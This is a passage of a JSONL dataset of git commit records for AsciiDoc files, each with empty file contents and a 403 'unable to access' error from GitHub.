403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad631b0c6e465dea4c2e08725282993e1102d4ee","subject":"add post","message":"add post\n","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2017-04-04-Unit-tests-python.adoc","new_file":"_posts\/2017-04-04-Unit-tests-python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9835e61744e20e7191144fd9d37ab2218f860933","subject":"Update 2019-03-21-consider-database.adoc","message":"Update 2019-03-21-consider-database.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-21-consider-database.adoc","new_file":"_posts\/2019-03-21-consider-database.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"148b5d7cccaef25d4406a1fe51e41fc52d4bf938","subject":"re-organizing after meeting","message":"re-organizing after meeting\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f5b1cdb851fc84c2355dd733d2ff05dd27bcba5","subject":"Create troubleshooting.asciidoc","message":"Create troubleshooting.asciidoc","repos":"openshift-evangelists\/vagrant-origin,openshift-evangelists\/vagrant-origin","old_file":"troubleshooting.asciidoc","new_file":"troubleshooting.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openshift-evangelists\/vagrant-origin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0df5ea7c8bd94a3aa693473efb959b62002ac9c1","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02b614c690ac2e25065132760aaee92b26d51904","subject":"[docs] Remove flume kerberos limitation","message":"[docs] Remove flume kerberos limitation\n\nRemoves the flume kerberos limitation as it was resolved\nvia KUDU-2012.\n\nChange-Id: Ied4704fc16b18fe0ee93570c3cbbbf6f61da8a4a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12978\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee8e3684cfaba11bf009b9aac9631aeb4c3fd72b","subject":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","message":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63367cceac92c5611a3d699e55308bb844636fcc","subject":"Update 2016-09-06-TWCTF-Writeups.adoc","message":"Update 2016-09-06-TWCTF-Writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9712e9bde1b9daa65889359228575aff3877b01","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac3c5b2afd7a90c64d600e8a33c4cb3bafe403d6","subject":"S6 S7","message":"S6 S7\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5395d718ab16f67417318321638b8c9fefdfb1b1","subject":"Update 2015-10-05-Hell-Cell-Number-3.adoc","message":"Update 2015-10-05-Hell-Cell-Number-3.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-Hell-Cell-Number-3.adoc","new_file":"_posts\/2015-10-05-Hell-Cell-Number-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd97567b8605e1dc1f735c77b6000ba7be41c102","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"061cf01dc01f920be4881ac55df61dacf9e53a52","subject":"Update 2019-03-10-And-thats-an-Email.adoc","message":"Update 2019-03-10-And-thats-an-Email.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9de7320d6cd878442f91e7856d077a811cdb4147","subject":"Add contributing guide","message":"Add contributing guide\n","repos":"maxamillion\/origin,pweil-\/origin,jprukner\/origin,jpeeler\/origin,mingderwang\/origin,y0no\/origin,tnozicka\/origin,ashcrow\/origin,biyiklioglu\/origin,thrasher-redhat\/origin,mrogers950\/origin,dobbymoodge\/origin,sjug\/origin,grdryn\/origin,deads2k\/origin,Tlacenka\/origin,sseago\/origin,swizzley\/origin,xuant\/origin,benjaminapetersen\/origin,biyiklioglu\/origin,rhamilto\/origin,burmanm\/origin,marun\/origin,elyscape\/origin,tnozicka\/origin,Nick-Harvey\/origin,abutcher\/origin,pkdevbox\/origin,dustintownsend\/origin,janetkuo\/origin,sseago\/origin,chlunde\/origin,marun\/origin,markllama\/atomic-enterprise,romanbartl\/origin,dcbw\/origin,jwforres\/origin,jprukner\/origin,childsb\/origin,sseago\/origin,jwhonce\/origin,jprukner\/origin,anpingli\/origin,dinhxuanvu\/origin,lorenzogm\/openshift-origin,ingvagabund\/origin,raffaelespazzoli\/origin,moolitayer\/origin,allevo\/origin,jupierce\/origin,spohnan\/origin,tdawson\/origin,benjaminapetersen\/origin,smarterclayton\/origin,pombredanne\/atomic-enterprise,craigmunro\/origin,EricMountain-1A\/openshift-origin,gashcrumb\/origin,hferentschik\/origin,sgallagher\/origin,detiber\/origin,Nick-Harvey\/origin,jhadvig\/origin,StevenLudwig\/origin,vongalpha\/origin,linzhaoming\/origin,marsmensch\/atomic-enterprise,joshuawilson\/origin,rajkotecha\/origin,dustintownsend\/origin,lixueclaire\/origin,imcsk8\/origin,detiber\/origin,rajkotecha\/origin,ncdc\/origin,sg00dwin\/origin,hferentschik\/origin,gruiz17\/origin,domenicbove\/origin,liangxia\/origin,thrasher-redhat\/origin,stackdocker\/origin,akram\/origin,cgwalters\/origin,liggitt\/origin,tiwillia\/origin,craigmunro\/origin,nak3\/origin,jeffvance\/origin,mfisher-rht\/origin,joshuawilson\/origin,oybed\/origin,rchicoli\/openshift-origin,zofuthan\/origin,swizzley\/origin,gesrat-cisco\/origin,yarko\/origin,dmage\/origin,y0no\/origin,dobbymoodge\/origin,pombredanne\/atomic-enterprise,rhuss\/origin,aveshagarwal\/origin,pkdevbox\/origin,danwinship\/origin,gruiz17\/origin,gesrat-cisco\/origin,miminar\/atomic-enterprise,sseago\/origin,sg00dwin\/origin,imcsk8\/origin,oybed\/origin,Jandersoft\/origin,fabianofranz\/origin,liangxia\/origin,liggitt\/origin,projectatomic\/atomic-enterprise,spinolacastro\/origin,mjisyang\/origin,spadgett\/origin,benjaminapetersen\/origin,pmorie\/origin,rchicoli\/openshift-origin,mahak\/origin,liggitt\/origin,thesteve0\/origin,pacoja84\/origin,dcrisan\/origin,burmanm\/origin,domenicbove\/origin,barrett-vegas-com\/origin,php-coder\/origin,greyfairer\/openshift-origin,myfear\/origin,maleck13\/origin,westmisfit\/origin,zhaosijun\/origin,adietish\/origin,grdryn\/origin,mdshuai\/origin,dgoodwin\/origin,jim-minter\/origin,jhammant\/origin,jdnieto\/origin,myfear\/origin,imcsk8\/origin,lixueclaire\/origin,grdryn\/origin,bowenha2\/origin
,Jandersolutions\/origin,stefwalter\/origin,rrati\/origin,pecameron\/origin,maleck13\/origin,imcsk8\/origin,stefwalter\/origin,dustintownsend\/origin,lorenzogm\/openshift-origin,asiainfoLDP\/datafactory,tracyrankin\/origin,nitintutlani\/origin,php-coder\/origin,moolitayer\/origin,dkorn\/origin,linux-on-ibm-z\/origin,gashcrumb\/origin,kargakis\/origin,jhadvig\/origin,dgoodwin\/origin,linearregression\/origin,ocsbrandon\/origin,rhuss\/origin,linearregression\/origin,rootfs\/origin,rusenask\/origin,wjiangjay\/origin,ashcrow\/origin,ironcladlou\/origin,bowenha2\/origin,danwinship\/origin,dmage\/origin,janetkuo\/origin,chmouel\/origin,kargakis\/origin,robertol\/origin,deads2k\/origin,y0no\/origin,jsafrane\/origin,moolitayer\/origin,sseago\/origin,sallyom\/origin,dustintownsend\/origin,mrogers950\/origin,vongalpha\/origin,YannMoisan\/origin,fkirill\/origin,oybed\/origin,hferentschik\/origin,sgallagher\/origin,pmorie\/origin,arilivigni\/origin,tnozicka\/origin,nak3\/origin,thrasher-redhat\/origin,aveshagarwal\/origin,marsmensch\/atomic-enterprise,rootfs\/origin,mkumatag\/origin,tnozicka\/origin,smunilla\/origin,Jandersolutions\/origin,ryanj\/origin,asiainfoLDP\/datafactory,pkdevbox\/origin,tagoh\/origin,jhammant\/origin,deads2k\/origin,tracyrankin\/origin,Nick-Harvey\/origin,stackdocker\/origin,samsong8610\/origin,smarterclayton\/origin,swizzley\/origin,jwhonce\/origin,legionus\/origin,StevenLudwig\/origin,jwforres\/origin,spadgett\/origin,php-coder\/origin,benjaminapetersen\/origin,mkumatag\/origin,ironcladlou\/origin,xuant\/origin,christian-posta\/origin,allevo\/origin,pombredanne\/atomic-enterprise,inlandsee\/origin,jpeeler\/origin,chmouel\/origin,samsong8610\/origin,tjanez\/origin,pgmcd\/origin,miminar\/origin,pacoja84\/origin,php-coder\/origin,wjiangjay\/origin,mfojtik\/origin,thesteve0\/origin,myfear\/origin,jeremyeder\/origin,openshift\/origin,detiber\/origin,pgmcd\/origin,mingderwang\/origin,samsong8610\/origin,miminar\/origin,juanvallejo\/origin,mnagy\/origin,kargakis\/origin,levivic\/origin,ironcladlou\/origin,wjiangjay\/origin,tagoh\/origin,zofuthan\/origin,rafabene\/origin,chmouel\/origin,pgmcd\/origin,spohnan\/origin,samsong8610\/origin,tiwillia\/origin,cgwalters\/origin,yarko\/origin,luciddreamz\/origin,vongalpha\/origin,wjiangjay\/origin,rajkotecha\/origin,jupierce\/origin,eparis\/origin,romanbartl\/origin,jwforres\/origin,adelton\/origin,seveillac\/origin,hferentschik\/origin,derekwaynecarr\/origin,enj\/origin,aweiteka\/origin,burmanm\/origin,akram\/origin,xuant\/origin,liggitt\/origin,ejemba\/origin,Jandersoft\/origin,rusenask\/origin,goern\/origin,swizzley\/origin,wjiangjay\/origin,willmtemple\/origin,levivic\/origin,PI-Victor\/origin,danwinship\/origin,rajatchopra\/origin,fabianofranz\/origin,enj\/origin,greyfairer\/openshift-origin,imcsk8\/origin,spinolacastro\/origin,StevenLudwig\/origin,mahak\/origin,ingvagabund\/origin,akram\/origin,hingstarne\/origin,ravisantoshgudimetla\/origin,eparis\/origin,ravisantoshgudimetla\/origin,enj\/origin,mrogers950\/origin,mnagy\/origin,rhuss\/origin,knobunc\/origin,HyunsooKim1112\/origin,hingstarne\/origin,EricMountain-1A\/openshift-origin,westmisfit\/origin,tjanez\/origin,legionus\/origin,jhadvig\/origin,sgallagher\/origin,soltysh\/origin,burmanm\/origin,mfisher-rht\/origin,rajatchopra\/origin,thesteve0\/origin,ncdc\/origin,Tlacenka\/origin,rhcarvalho\/origin,wyue-redhat\/origin,myfear\/origin,sosiouxme\/origin,mdshuai\/origin,janetkuo\/origin,liggitt\/origin,jsafrane\/origin,rhuss\/origin,Tlacenka\/origin,smunilla\/origin,hroyrh\/origin,roma
nbartl\/origin,arilivigni\/origin,danwinship\/origin,ravisantoshgudimetla\/origin,hingstarne\/origin,joshuawilson\/origin,jwforres\/origin,dustintownsend\/origin,dcrisan\/origin,tjcunliffe\/origin,sdminonne\/origin,elyscape\/origin,ncdc\/origin,projectatomic\/atomic-enterprise,dcbw\/origin,levivic\/origin,markllama\/origin,greyfairer\/openshift-origin,rafabene\/origin,anpingli\/origin,maxamillion\/origin,php-coder\/origin,adelton\/origin,xuant\/origin,barrett-vegas-com\/origin,burmanm\/origin,matthyx\/origin,seveillac\/origin,rusenask\/origin,stackdocker\/origin,louyihua\/origin,lixueclaire\/origin,Tlacenka\/origin,jdnieto\/origin,StevenLudwig\/origin,raffaelespazzoli\/origin,stefwalter\/origin,jeremyeder\/origin,jeremyeder\/origin,mrogers950\/origin,liangxia\/origin,dcrisan\/origin,kargakis\/origin,ibotty\/origin,louyihua\/origin,Jandersoft\/origin,mnagy\/origin,dcrisan\/origin,pravisankar\/origin,robertol\/origin,liangxia\/origin,y0no\/origin,hingstarne\/origin,danwinship\/origin,benjaminapetersen\/origin,juanvallejo\/origin,tjcunliffe\/origin,coreydaley\/origin,ocsbrandon\/origin,Jandersoft\/origin,jwforres\/origin,mjisyang\/origin,jhadvig\/origin,yepengxj\/df,grdryn\/origin,tnozicka\/origin,ravisantoshgudimetla\/origin,christian-posta\/origin,miminar\/origin,maleck13\/origin,sdodson\/origin,robertol\/origin,stackdocker\/origin,tnguyen-rh\/origin,craigmunro\/origin,linearregression\/origin,markllama\/origin,ryanj\/origin,jprukner\/origin,rhcarvalho\/origin,pombredanne\/atomic-enterprise,seveillac\/origin,stevekuznetsov\/origin,danmcp\/origin,EricMountain-1A\/openshift-origin,zofuthan\/origin,elyscape\/origin,danwinship\/origin,jeremyeder\/origin,spinolacastro\/origin,hroyrh\/origin,legionus\/origin,sjug\/origin,marsmensch\/atomic-enterprise,spinolacastro\/origin,knobunc\/origin,allevo\/origin,spohnan\/origin,rafabene\/origin,ramr\/origin,smarterclayton\/origin,maxamillion\/origin,juanvallejo\/origin,yarko\/origin,matthyx\/origin,markllama\/atomic-enterprise,markllama\/origin,yepengxj\/df,codificat\/origin,projectatomic\/atomic-enterprise,gashcrumb\/origin,mnagy\/origin,nak3\/origin,elyscape\/origin,pacoja84\/origin,stefwalter\/origin,sg00dwin\/origin,tracyrankin\/origin,westmisfit\/origin,juanvallejo\/origin,jim-minter\/origin,zhaosijun\/origin,juanvallejo\/origin,jupierce\/origin,marun\/origin,ocsbrandon\/origin,wyue-redhat\/origin,robertol\/origin,sferich888\/origin,robertol\/origin,smunilla\/origin,miminar\/origin,chmouel\/origin,chlunde\/origin,linzhaoming\/origin,gabemontero\/origin,abutcher\/origin,barrett-vegas-com\/origin,christian-posta\/origin,jpeeler\/origin,romanbartl\/origin,dgoodwin\/origin,bparees\/origin,hferentschik\/origin,pkdevbox\/origin,mnagy\/origin,tnozicka\/origin,linzhaoming\/origin,Nick-Harvey\/origin,christian-posta\/origin,mrunalp\/origin,ashcrow\/origin,zofuthan\/origin,grdryn\/origin,jhammant\/origin,cgwalters\/origin,maxamillion\/origin,Miciah\/origin,gesrat-cisco\/origin,mrunalp\/origin,dcrisan\/origin,dobbymoodge\/origin,php-coder\/origin,miminar\/origin,tdawson\/origin,sspeiche\/origin,tdawson\/origin,EricMountain-1A\/openshift-origin,lixueclaire\/origin,jhadvig\/origin,derekwaynecarr\/origin,ejemba\/origin,dkorn\/origin,sdodson\/origin,allevo\/origin,romanbartl\/origin,seveillac\/origin,tagoh\/origin,kargakis\/origin,bparees\/origin,mfisher-rht\/origin,goern\/origin,goern\/origin,adietish\/origin,fkirill\/origin,ashcrow\/origin,sallyom\/origin,jeffvance\/origin,christian-posta\/origin,rhamilto\/origin,luciddreamz\/origin,greyfairer\/openshift-origin,von
galpha\/origin,mjisyang\/origin,mfojtik\/origin,senayar\/origin,stefwalter\/origin,rrati\/origin,simo5\/origin,gabemontero\/origin,miminar\/origin,bowenha2\/origin,dinhxuanvu\/origin,mkumatag\/origin,spohnan\/origin,asiainfoLDP\/datafactory,soltysh\/origin,YannMoisan\/origin,spohnan\/origin,rajatchopra\/origin,joshuawilson\/origin,nitintutlani\/origin,gesrat-cisco\/origin,mingderwang\/origin,ocsbrandon\/origin,zofuthan\/origin,markllama\/origin,asiainfoLDP\/datafactory,elyscape\/origin,ramr\/origin,HyunsooKim1112\/origin,linzhaoming\/origin,smarterclayton\/origin,childsb\/origin,knobunc\/origin,PI-Victor\/origin,willmtemple\/origin,JacobTanenbaum\/origin,mfisher-rht\/origin,xuant\/origin,craigmunro\/origin,projectatomic\/atomic-enterprise,raffaelespazzoli\/origin,pgmcd\/origin,eparis\/origin,tjanez\/origin,pecameron\/origin,rhcarvalho\/origin,tnguyen-rh\/origin,dkorn\/origin,HyunsooKim1112\/origin,ibotty\/origin,derekwaynecarr\/origin,miminar\/atomic-enterprise,rhuss\/origin,detiber\/origin,knobunc\/origin,Tlacenka\/origin,levivic\/origin,pravisankar\/origin,goern\/origin,miminar\/atomic-enterprise,lorenzogm\/openshift-origin,domenicbove\/origin,markllama\/atomic-enterprise,stevekuznetsov\/origin,ramr\/origin,inlandsee\/origin,dinhxuanvu\/origin,sdminonne\/origin,rajatchopra\/origin,jhammant\/origin,dkorn\/origin,jdnieto\/origin,marsmensch\/atomic-enterprise,rusenask\/origin,EricMountain-1A\/openshift-origin,chlunde\/origin,maxamillion\/origin,tnguyen-rh\/origin,miminar\/atomic-enterprise,tjcunliffe\/origin,Jandersolutions\/origin,tnguyen-rh\/origin,pravisankar\/origin,moolitayer\/origin,thesteve0\/origin,projectatomic\/atomic-enterprise,abutcher\/origin,YannMoisan\/origin,westmisfit\/origin,miminar\/atomic-enterprise,bowenha2\/origin,inlandsee\/origin,domenicbove\/origin,aveshagarwal\/origin,ryanj\/origin,jwhonce\/origin,jwforres\/origin,dcbw\/origin,thesteve0\/origin,sspeiche\/origin,wanghaoran1988\/origin,pacoja84\/origin,tiwillia\/origin,Nick-Harvey\/origin,jdnieto\/origin,miminar\/atomic-enterprise,sgallagher\/origin,Miciah\/origin,tagoh\/origin,thesteve0\/origin,romanbartl\/origin,Jandersolutions\/origin,danmcp\/origin,HyunsooKim1112\/origin,sdodson\/origin,adelton\/origin,jupierce\/origin,craigmunro\/origin,YannMoisan\/origin,jwhonce\/origin,rajatchopra\/origin,sosiouxme\/origin,childsb\/origin,arilivigni\/origin,janetkuo\/origin,quantiply-fork\/origin,tnguyen-rh\/origin,spohnan\/origin,jsafrane\/origin,Jandersolutions\/origin,gabemontero\/origin,adelton\/origin,mnagy\/origin,matthyx\/origin,yarko\/origin,oybed\/origin,thrasher-redhat\/origin,adietish\/origin,moolitayer\/origin,Jandersoft\/origin,ocsbrandon\/origin,fabianofranz\/origin,yarko\/origin,luciddreamz\/origin,markllama\/atomic-enterprise,dcbw\/origin,dkorn\/origin,childsb\/origin,cgwalters\/origin,codificat\/origin,adelton\/origin,wyue-redhat\/origin,Jandersoft\/origin,jhammant\/origin,jeffvance\/origin,domenicbove\/origin,matthyx\/origin,abutcher\/origin,nitintutlani\/origin,louyihua\/origin,dgoodwin\/origin,cgwalters\/origin,wanghaoran1988\/atomic-enterprise,wyue-redhat\/origin,nhr\/origin,grdryn\/origin,rchicoli\/openshift-origin,matthyx\/origin,tjcunliffe\/origin,joshuawilson\/origin,wanghaoran1988\/origin,asiainfoLDP\/datafactory,childsb\/origin,greyfairer\/openshift-origin,dcbw\/origin,ravisantoshgudimetla\/origin,fkirill\/origin,willmtemple\/origin,wanghaoran1988\/origin,adietish\/origin,benjaminapetersen\/origin,louyihua\/origin,sspeiche\/origin,rhamilto\/origin,marsmensch\/atomic-enterprise,joshuawilson\/origin,gru
iz17\/origin,HyunsooKim1112\/origin,senayar\/origin,quantiply-fork\/origin,ibotty\/origin,markllama\/atomic-enterprise,legionus\/origin,zhaosijun\/origin,linearregression\/origin,quantiply-fork\/origin,csrwng\/origin,luciddreamz\/origin,dcrisan\/origin,ryanj\/origin,dustintownsend\/origin,stackdocker\/origin,pmorie\/origin,domenicbove\/origin,adietish\/origin,burmanm\/origin,rajkotecha\/origin,bowenha2\/origin,sallyom\/origin,nhr\/origin,jwhonce\/origin,JacobTanenbaum\/origin,gruiz17\/origin,jeffvance\/origin,samsong8610\/origin,quantiply-fork\/origin,soltysh\/origin,sdodson\/origin,rafabene\/origin,janetkuo\/origin,stefwalter\/origin,rhamilto\/origin,tagoh\/origin,jhammant\/origin,hferentschik\/origin,codificat\/origin,chlunde\/origin,yepengxj\/df,pgmcd\/origin,StevenLudwig\/origin,liangxia\/origin,wanghaoran1988\/atomic-enterprise,jwhonce\/origin,xiuwang\/origin,rrati\/origin,lorenzogm\/openshift-origin,nhr\/origin,cgwalters\/origin,aweiteka\/origin,yarko\/origin,luciddreamz\/origin,aveshagarwal\/origin,smunilla\/origin,spadgett\/origin,StevenLudwig\/origin,markllama\/origin,y0no\/origin,ibotty\/origin,anpingli\/origin,christian-posta\/origin,spinolacastro\/origin,tjcunliffe\/origin,stackdocker\/origin,dmage\/origin,openshift\/origin,vongalpha\/origin,vongalpha\/origin,rootfs\/origin,nhr\/origin,dinhxuanvu\/origin,Nick-Harvey\/origin,rootfs\/origin,liangxia\/origin,danmcp\/origin,detiber\/origin,bowenha2\/origin,pgmcd\/origin,aweiteka\/origin,mjisyang\/origin,tagoh\/origin,projectatomic\/atomic-enterprise,ejemba\/origin,allevo\/origin,rafabene\/origin,craigmunro\/origin,ramr\/origin,myfear\/origin,mingderwang\/origin,dobbymoodge\/origin,gesrat-cisco\/origin,zofuthan\/origin,simo5\/origin,allevo\/origin,sosiouxme\/origin,ncdc\/origin,swizzley\/origin,barrett-vegas-com\/origin,pacoja84\/origin,simo5\/origin,fabianofranz\/origin,linux-on-ibm-z\/origin,levivic\/origin,rafabene\/origin,pweil-\/origin,spinolacastro\/origin,rusenask\/origin,mdshuai\/origin,imcsk8\/origin,PI-Victor\/origin,y0no\/origin,wyue-redhat\/origin,linux-on-ibm-z\/origin,dinhxuanvu\/origin,linux-on-ibm-z\/origin,ejemba\/origin,spadgett\/origin,samsong8610\/origin,linux-on-ibm-z\/origin,aweiteka\/origin,tjanez\/origin,codificat\/origin,rrati\/origin,gruiz17\/origin,legionus\/origin,mrogers950\/origin,coreydaley\/origin,pmorie\/origin,markllama\/origin,EricMountain-1A\/openshift-origin,simo5\/origin,rajkotecha\/origin,wanghaoran1988\/atomic-enterprise,YannMoisan\/origin,rrati\/origin,jhadvig\/origin,yepengxj\/df,ashcrow\/origin,mdshuai\/origin,simo5\/origin,csrwng\/origin,stevekuznetsov\/origin,rhcarvalho\/origin,ryanj\/origin,janetkuo\/origin,mfojtik\/origin,ashcrow\/origin,PI-Victor\/origin,pombredanne\/atomic-enterprise,swizzley\/origin,luciddreamz\/origin,gruiz17\/origin,jdnieto\/origin,tnguyen-rh\/origin,ibotty\/origin,lorenzogm\/openshift-origin,biyiklioglu\/origin,openshift\/origin,mingderwang\/origin,quantiply-fork\/origin,sdodson\/origin,markllama\/atomic-enterprise,maleck13\/origin,westmisfit\/origin,pkdevbox\/origin,pkdevbox\/origin,Tlacenka\/origin,wanghaoran1988\/origin,wanghaoran1988\/origin,barrett-vegas-com\/origin,jprukner\/origin,biyiklioglu\/origin,bparees\/origin,mdshuai\/origin,marun\/origin,arilivigni\/origin,childsb\/origin,csrwng\/origin,pmorie\/origin,linzhaoming\/origin,willmtemple\/origin,mjisyang\/origin,eparis\/origin,sg00dwin\/origin,spadgett\/origin,jpeeler\/origin,sdodson\/origin,rchicoli\/openshift-origin,danmcp\/origin,louyihua\/origin,fkirill\/origin,nhr\/origin,jim-minter\/origin,ibotty\/o
rigin,wanghaoran1988\/atomic-enterprise,smunilla\/origin,tracyrankin\/origin,xuant\/origin,quantiply-fork\/origin,sspeiche\/origin,senayar\/origin,lorenzogm\/openshift-origin,dkorn\/origin,rhuss\/origin,ocsbrandon\/origin,sferich888\/origin,PI-Victor\/origin,linux-on-ibm-z\/origin,jpeeler\/origin,moolitayer\/origin,zhaosijun\/origin,tdawson\/origin,jprukner\/origin,barrett-vegas-com\/origin,tiwillia\/origin,adietish\/origin,ingvagabund\/origin,YannMoisan\/origin,rusenask\/origin,stevekuznetsov\/origin,biyiklioglu\/origin,ejemba\/origin,sdminonne\/origin,jupierce\/origin,rootfs\/origin,tjanez\/origin,aweiteka\/origin,pecameron\/origin,nitintutlani\/origin,juanvallejo\/origin,marsmensch\/atomic-enterprise,abutcher\/origin,mfisher-rht\/origin,ramr\/origin,robertol\/origin,mahak\/origin,Jandersolutions\/origin,dobbymoodge\/origin,myfear\/origin,fkirill\/origin,wanghaoran1988\/atomic-enterprise,seveillac\/origin,pravisankar\/origin,xiuwang\/origin,hroyrh\/origin,hingstarne\/origin,westmisfit\/origin,mingderwang\/origin,seveillac\/origin,asiainfoLDP\/datafactory,dobbymoodge\/origin,gesrat-cisco\/origin,xiuwang\/origin,mdshuai\/origin,tjcunliffe\/origin,JacobTanenbaum\/origin,senayar\/origin,jdnieto\/origin,gashcrumb\/origin,levivic\/origin,mfisher-rht\/origin,Miciah\/origin,ejemba\/origin,smarterclayton\/origin,mjisyang\/origin,mrunalp\/origin,ryanj\/origin,rajkotecha\/origin,kargakis\/origin,oybed\/origin,wyue-redhat\/origin,lixueclaire\/origin,rajatchopra\/origin,senayar\/origin,pweil-\/origin,oybed\/origin,hingstarne\/origin,tjanez\/origin,HyunsooKim1112\/origin,biyiklioglu\/origin,nitintutlani\/origin,raffaelespazzoli\/origin,aveshagarwal\/origin,pravisankar\/origin,aweiteka\/origin,rhamilto\/origin,fkirill\/origin,greyfairer\/openshift-origin,dmage\/origin,PI-Victor\/origin,sferich888\/origin,sjug\/origin,jeremyeder\/origin,dgoodwin\/origin,inlandsee\/origin,nitintutlani\/origin,wjiangjay\/origin,liggitt\/origin,rhcarvalho\/origin,smunilla\/origin,wanghaoran1988\/atomic-enterprise,pacoja84\/origin,mrogers950\/origin,pombredanne\/atomic-enterprise,sseago\/origin,senayar\/origin,lixueclaire\/origin,coreydaley\/origin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 